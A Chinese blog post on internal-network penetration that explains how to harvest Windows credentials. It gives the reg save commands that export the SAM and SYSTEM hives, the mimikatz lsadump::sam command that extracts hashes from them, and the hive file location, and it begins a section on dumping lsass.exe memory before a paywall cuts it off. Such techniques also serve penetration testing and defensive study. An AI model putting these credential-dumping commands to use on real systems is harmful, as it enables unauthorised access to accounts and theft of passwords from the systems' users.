内网渗透(抓取明文密码)

Beyond My

于 2021-12-26 15:41:47 发布

阅读量1.3k

点赞数

分类专栏：内网渗透渗透测试文章标签：安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/qq_42383069/article/details/122155420

版权

本文介绍了内网渗透过程中获取明文密码的方法，包括通过注册表导出SAM和SYS文件，使用mimikatz工具进行解密，以及利用procdump程序导出lsass内存。特别指出，在Windows 2012及以上系统中，需修改注册表后才能导出明文密码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1. 注册表导出

reg save hklm\sam sam.hiv ———> SAM文件
reg save hklm\system sys.hiv ———> SYS文件
注意事项：
1）在Windows 2003版本包含2003以上都可以使用该命令
2）在windows 2003中他会以ltml
3）都是加密Hash
演示：
1）下载mimikatz然后执行：

lsadump::sam /sam:sam.hiv /system:sys.hiv

2. 获取系统文件

位置：
C:\Windows\System32\config

3. 获取明文密码

1. 任务管理器导出lsass.exe内存
1）任务管理器中找到 lsass.exe
在这里插入图片描述
2 ）创建转储文件

最低0.47元/天解锁文章

博客等级

码龄7年

64
原创

186
点赞

757
收藏

748
粉丝

关注

私信

热门文章

分类专栏

最新评论

使用Proxifier+burp抓包总结
yxihx: 你burp啥都不设也能抓到？？
内网渗透_IPC
金银花1983: 能不能搭建kali跳板？
使用Proxifier+burp抓包总结
hac147: 抓不到小程序的包
Python爬取网页图片至本地
普通网友: import requests from bs4 import BeautifulSoup from lxml import etree if __name__ == '__main__': photos = [] headers = { 'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/113.0.0.0 " "Safari/537.36 " "Edg/113.0.1774.50", } # 构造请求头 url = 'https://everia.club/2023/05/18/cosplay-%e8%a0%a2%e6%b2%ab%e6%b2%ab-chunmomo-%e7%b2%be%e7%81%b5%e6%9d%91-%e7%ac%ac%e4%b8%80%e6%9d%91%e4%ba%ba/' req = requests.get(url, headers) req.encoding = 'UTF-8' page_text = req.text # 获取网页数据 def download_img(): length = len(photos) print(length) for img_url, i in zip(photos, [i for i in range(1, length+1, 1)]): print("#" * 60) print(f"正在下载第{i}张......") r = requests.get(img_url, headers=headers, stream=True) # print(r.status_code) # 返回状态码 i
内网渗透_IPC
m0_68295334: 执行完at命令，显示绑定句柄无效怎么回事

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。